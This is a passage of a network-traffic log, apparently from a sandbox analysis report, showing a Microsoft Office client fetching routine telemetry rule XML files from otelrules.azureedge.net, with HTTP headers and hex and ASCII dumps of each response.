                                                                                                                                                                                  2024-11-23 13:47:59 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  139192.168.2.44993413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:59 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:59 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1368
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                  x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134759Z-178bfbc474bxkclvhC1NYC69g400000004k0000000002z9p
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:59 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  140192.168.2.44993313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:59 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:59 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1405
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                  x-ms-request-id: efd631bc-c01e-008d-6f47-3c2eec000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134759Z-15b8b599d885ffrhhC1TEBtuv00000000350000000002pfx
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:59 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  141192.168.2.44993513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:00 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:00 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                  x-ms-request-id: afa98cfc-701e-003e-2a3c-3c79b3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134800Z-178bfbc474bpscmfhC1NYCfc2c000000032g00000000f6ry
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:00 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  142192.168.2.44993613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:00 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1378
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE584C214"
                                                                                                                                                                                  x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134801Z-178bfbc474bv587zhC1NYCny5w00000004eg000000006kra
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:01 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  143192.168.2.44993713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:01 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                  x-ms-request-id: 23fc118c-601e-0084-474e-3c6b3f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134801Z-178bfbc474bbcwv4hC1NYCypys00000004dg000000007tkd
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:01 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  144192.168.2.44993913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:01 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:01 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1397
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                  x-ms-request-id: 8149a5d6-a01e-001e-117b-3b49ef000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134801Z-174c587ffdfn4nhwhC1TEB2nbc000000031g00000000emub
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  145192.168.2.44993813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:01 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1370
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                  x-ms-request-id: a4032f19-b01e-0084-598d-3bd736000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134801Z-174c587ffdf59vqchC1TEByk68000000032g00000000gcud
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:01 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  146192.168.2.44994013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:02 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:02 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1360
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                  x-ms-request-id: c1bcbb00-101e-0065-7560-3b4088000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134802Z-178bfbc474bv7whqhC1NYC1fg400000004mg000000004v5d
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  147192.168.2.44994113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:03 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:48:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:48:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1406
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                  x-ms-request-id: 990fd94f-f01e-0052-6c4e-3c9224000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134803Z-178bfbc474bscnbchC1NYCe7eg00000004p000000000b29n
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:48:03 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  148192.168.2.44994213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:48:03 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
